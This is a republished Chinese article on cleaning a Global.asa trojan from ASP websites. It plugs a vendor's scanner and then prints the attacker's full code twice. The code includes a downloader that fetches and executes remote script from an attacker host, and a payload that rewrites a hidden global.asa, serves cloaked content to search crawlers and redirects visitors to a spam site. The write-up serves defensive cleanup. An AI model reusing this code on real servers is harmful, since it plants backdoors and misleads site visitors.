网站中Global.asa木马的快速清除方法
程序员文章站
2022-06-28 09:19:01
网站中Global.asa木马的快速清除方法最近客户的多个页面中了远程加载一些代码的页面,主要是利用MSXML2.serverXMLHTTP来加载一些代码并执行,下面是具体的解决方法。... 11-03-27...
解决办法:
1、用青云团队开发的网站木马清理专家全面扫描服务器上的网站,网站木马清理专家下载地址:
2、如果这时木马还是存在,用我们的网站木马清理专家的快速查马功能快速查杀by*aming或aming特征码,如下图所示:
3、关闭服务器上的缩略图功能 方法参考 https://www.jb51.net/os/windows/win2003/34960.html
根源:
这次用户中的是下载者类的木马,黑客通过网站上传漏洞上在网站根目录的foot.asp下插入了以下代码:
<%
'by*aming
function gethtml(url)
set objxmlhttp=server.createobject("msxml2.serverxmlhttp")
objxmlhttp.open "get",url,false
objxmlhttp.setrequestheader "user-agent",url
objxmlhttp.send
gethtml=objxmlhttp.responsebody
set objxmlhttp=nothing
set objstream = server.createobject("adodb.stream")
objstream.type = 1
objstream.mode =3
objstream.open
objstream.write gethtml
objstream.position = 0
objstream.type = 2
objstream.charset = "gb2312"
gethtml = objstream.readtext
objstream.close
set objstream=nothing
end function
execute(gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>
清掉这段代码即可解决问题,网站木马清理专家查杀结果如下图所示!
xmlasaquan.txt的内容如下:
'<html><head><script>function clear(){source=document.body.firstchild.data;document.open();document.close();document.title="";document.body.innerhtml=source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;url=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,string)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new regexp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
'by*aming
server.scripttimeout=600
public function createasa(byval content)
on error resume next
set fso = server.createobject("scripting.filesystemobject")
set f=fso.getfile("//./" & server.mappath("/global.asa"))
f.attributes=0
set obj = server.createobject("adod" & "b.s" & "tream")
obj.type = 2
obj.open
obj.charset = "gb2312"
obj.position = obj.size
obj.writetext = content
obj.savetofile "//./" & server.mappath("/global.asa"),2
obj.close
set obj = nothing
f.attributes=1+2+4
set f=nothing
set fso = nothing
end function
public function gethtml(url)
set objxmlhttp=server.createobject("msxml2.serverxmlhttp")
objxmlhttp.open "get",url,false
objxmlhttp.setrequestheader "user-agent",url
objxmlhttp.send
gethtml=objxmlhttp.responsebody
set objxmlhttp=nothing
set objstream = server.createobject("adodb.stream")
objstream.type = 1
objstream.mode =3
objstream.open
objstream.write gethtml
objstream.position = 0
objstream.type = 2
objstream.charset = "gb2312"
gethtml = objstream.readtext
objstream.close
end function
function check(user_agent)
allow_agent=split("baiduspider,sogou,baidu,sosospider,googlebot,fast-webcrawler,msnbot,slurp",",")
check_agent=false
for agenti=lbound(allow_agent) to ubound(allow_agent)
if instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
next
check=check_agent
end function
function checkrobot()
checkrobot = false
dim botlist,i,repls
repls = request.servervariables("http_user_agent")
krobotlist = "baiduspider|googlebot"
botlist = split(krobotlist,"|")
for i = 0 to ubound(botlist)
if instr(repls,botlist(i)) > 0 then
checkrobot = true
exit for
end if
next
if request.querystring("admin")= "1" then session("thischeckrobot")=1
if session("thischeckrobot") = 1 then checkrobot = true
end function
function checkrefresh()
checkrefresh = false
dim botlist,i,repls
krobotlist = "baidu|google|sogou|soso|youdao"
botlist = split(krobotlist,"|")
for i = 0 to ubound(botlist)
if instr(left(request.servervariables("http_referer"),"40"),botlist(i)) > 0 then
checkrefresh = true
exit for
end if
next
end function
sub sleep()
if response.isclientconnected=true then
response.flush
else
response.end
end if
end sub
if checkrefresh=true then
cnnbd=lcase(request.servervariables("http_host"))
response.redirect("http://www.82767.com/?"&cnnbd&"")
'response.write("<a href=http://www.82767.com><font _fcksavedurl="http://www.82767.com><font" color=#ff0000>如果您的浏览器不支持跳转,请点击进入>>>>>></font></a><div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script _fcksavedurl="http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script" src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script>")
response.end
end if
user_agent=request.servervariables("http_user_agent")
if check(user_agent)=true then
body=gethtml("http://fudu.qpedu.cn/xml/prn/con.2.asp?domain="&strhost&"&ua="&server.urlencode(request.servervariables("http_user_agent"))&"")
response.write body
response.end
else
asa=gethtml("http://www.pornhome.com/dy7749/codequan.txt")
if instr(asa,"by*aming")>0 then
createasa(asa)
end if
scriptaddress=request.servervariables("script_name")
namepath=server.mappath(scriptaddress)
if len(request.querystring) > 0 then
scriptaddress = scriptaddress & "?" & request.querystring
end if
geturl ="http://"& request.servervariables("http_host") & scriptaddress
geturl =lcase(geturl)
'response.write replace(namepath,server.mappath("/"),"")
'response.end
'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(lcase(request.servervariables("http_host")),"gov.cn")=0 and instr(lcase(request.servervariables("http_host")),"edu.cn")=0 and
if instr(geturl,"http://"& request.servervariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& request.servervariables("http_host") &"/")=0 and instr(lcase(request.servervariables("http_referer")),lcase(request.servervariables("http_host")))<=0 then
agent = lcase(request.servervariables("http_user_agent"))
referer = lcase(request.servervariables("http_referer"))
bot = ""
amll = ""
if instr(agent, "+") > 0 then bot = agent
if instr(agent, "-") > 0 then bot = agent
if instr(agent, "http") > 0 then bot = agent
if instr(agent, "spider") > 0 then bot = agent
if instr(agent, "bot") > 0 then bot = agent
if instr(agent, "linux") > 0 then bot = agent
if instr(agent, "baidu") > 0 then bot = agent
if instr(agent, "google") > 0 then bot = "nobot"
if instr(agent, "yahoo") > 0 then bot = "nobot"
if instr(agent, "msn") > 0 then bot = "nobot"
if instr(agent, "alexa") > 0 then bot = "nobot"
if instr(agent, "sogou") > 0 then bot = "nobot"
if instr(agent, "youdao") > 0 then bot = "nobot"
if instr(agent, "soso") > 0 then bot = "nobot"
if instr(agent, "iask") > 0 then bot = "nobot"
if bot="nobot" then
'call writeerr
'response.end
end if
call sleep()
end if
end if
'</body></html>
1、用青云团队开发的网站木马清理专家全面扫描服务器上的网站,网站木马清理专家下载地址:
2、如果这时木马还是存在,用我们的网站木马清理专家的快速查马功能快速查杀by*aming或aming特征码,如下图所示:
3、关闭服务器上的缩略图功能 方法参考 https://www.jb51.net/os/windows/win2003/34960.html
根源:
这次用户中的是下载者类的木马,黑客通过网站上传漏洞上在网站根目录的foot.asp下插入了以下代码:
复制代码
代码如下:<%
'by*aming
function gethtml(url)
set objxmlhttp=server.createobject("msxml2.serverxmlhttp")
objxmlhttp.open "get",url,false
objxmlhttp.setrequestheader "user-agent",url
objxmlhttp.send
gethtml=objxmlhttp.responsebody
set objxmlhttp=nothing
set objstream = server.createobject("adodb.stream")
objstream.type = 1
objstream.mode =3
objstream.open
objstream.write gethtml
objstream.position = 0
objstream.type = 2
objstream.charset = "gb2312"
gethtml = objstream.readtext
objstream.close
set objstream=nothing
end function
execute(gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>
清掉这段代码即可解决问题,网站木马清理专家查杀结果如下图所示!
xmlasaquan.txt的内容如下:
复制代码
代码如下:'<html><head><script>function clear(){source=document.body.firstchild.data;document.open();document.close();document.title="";document.body.innerhtml=source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;url=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,string)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new regexp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
'by*aming
server.scripttimeout=600
public function createasa(byval content)
on error resume next
set fso = server.createobject("scripting.filesystemobject")
set f=fso.getfile("//./" & server.mappath("/global.asa"))
f.attributes=0
set obj = server.createobject("adod" & "b.s" & "tream")
obj.type = 2
obj.open
obj.charset = "gb2312"
obj.position = obj.size
obj.writetext = content
obj.savetofile "//./" & server.mappath("/global.asa"),2
obj.close
set obj = nothing
f.attributes=1+2+4
set f=nothing
set fso = nothing
end function
public function gethtml(url)
set objxmlhttp=server.createobject("msxml2.serverxmlhttp")
objxmlhttp.open "get",url,false
objxmlhttp.setrequestheader "user-agent",url
objxmlhttp.send
gethtml=objxmlhttp.responsebody
set objxmlhttp=nothing
set objstream = server.createobject("adodb.stream")
objstream.type = 1
objstream.mode =3
objstream.open
objstream.write gethtml
objstream.position = 0
objstream.type = 2
objstream.charset = "gb2312"
gethtml = objstream.readtext
objstream.close
end function
function check(user_agent)
allow_agent=split("baiduspider,sogou,baidu,sosospider,googlebot,fast-webcrawler,msnbot,slurp",",")
check_agent=false
for agenti=lbound(allow_agent) to ubound(allow_agent)
if instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
next
check=check_agent
end function
function checkrobot()
checkrobot = false
dim botlist,i,repls
repls = request.servervariables("http_user_agent")
krobotlist = "baiduspider|googlebot"
botlist = split(krobotlist,"|")
for i = 0 to ubound(botlist)
if instr(repls,botlist(i)) > 0 then
checkrobot = true
exit for
end if
next
if request.querystring("admin")= "1" then session("thischeckrobot")=1
if session("thischeckrobot") = 1 then checkrobot = true
end function
function checkrefresh()
checkrefresh = false
dim botlist,i,repls
krobotlist = "baidu|google|sogou|soso|youdao"
botlist = split(krobotlist,"|")
for i = 0 to ubound(botlist)
if instr(left(request.servervariables("http_referer"),"40"),botlist(i)) > 0 then
checkrefresh = true
exit for
end if
next
end function
sub sleep()
if response.isclientconnected=true then
response.flush
else
response.end
end if
end sub
if checkrefresh=true then
cnnbd=lcase(request.servervariables("http_host"))
response.redirect("http://www.82767.com/?"&cnnbd&"")
'response.write("<a href=http://www.82767.com><font _fcksavedurl="http://www.82767.com><font" color=#ff0000>如果您的浏览器不支持跳转,请点击进入>>>>>></font></a><div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script _fcksavedurl="http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script" src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script>")
response.end
end if
user_agent=request.servervariables("http_user_agent")
if check(user_agent)=true then
body=gethtml("http://fudu.qpedu.cn/xml/prn/con.2.asp?domain="&strhost&"&ua="&server.urlencode(request.servervariables("http_user_agent"))&"")
response.write body
response.end
else
asa=gethtml("http://www.pornhome.com/dy7749/codequan.txt")
if instr(asa,"by*aming")>0 then
createasa(asa)
end if
scriptaddress=request.servervariables("script_name")
namepath=server.mappath(scriptaddress)
if len(request.querystring) > 0 then
scriptaddress = scriptaddress & "?" & request.querystring
end if
geturl ="http://"& request.servervariables("http_host") & scriptaddress
geturl =lcase(geturl)
'response.write replace(namepath,server.mappath("/"),"")
'response.end
'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(lcase(request.servervariables("http_host")),"gov.cn")=0 and instr(lcase(request.servervariables("http_host")),"edu.cn")=0 and
if instr(geturl,"http://"& request.servervariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& request.servervariables("http_host") &"/")=0 and instr(lcase(request.servervariables("http_referer")),lcase(request.servervariables("http_host")))<=0 then
agent = lcase(request.servervariables("http_user_agent"))
referer = lcase(request.servervariables("http_referer"))
bot = ""
amll = ""
if instr(agent, "+") > 0 then bot = agent
if instr(agent, "-") > 0 then bot = agent
if instr(agent, "http") > 0 then bot = agent
if instr(agent, "spider") > 0 then bot = agent
if instr(agent, "bot") > 0 then bot = agent
if instr(agent, "linux") > 0 then bot = agent
if instr(agent, "baidu") > 0 then bot = agent
if instr(agent, "google") > 0 then bot = "nobot"
if instr(agent, "yahoo") > 0 then bot = "nobot"
if instr(agent, "msn") > 0 then bot = "nobot"
if instr(agent, "alexa") > 0 then bot = "nobot"
if instr(agent, "sogou") > 0 then bot = "nobot"
if instr(agent, "youdao") > 0 then bot = "nobot"
if instr(agent, "soso") > 0 then bot = "nobot"
if instr(agent, "iask") > 0 then bot = "nobot"
if bot="nobot" then
'call writeerr
'response.end
end if
call sleep()
end if
end if
'</body></html>
上一篇: 博客上一篇热点实操文章曾让我走了*运
下一篇: 网站个人渗透技巧收集与总结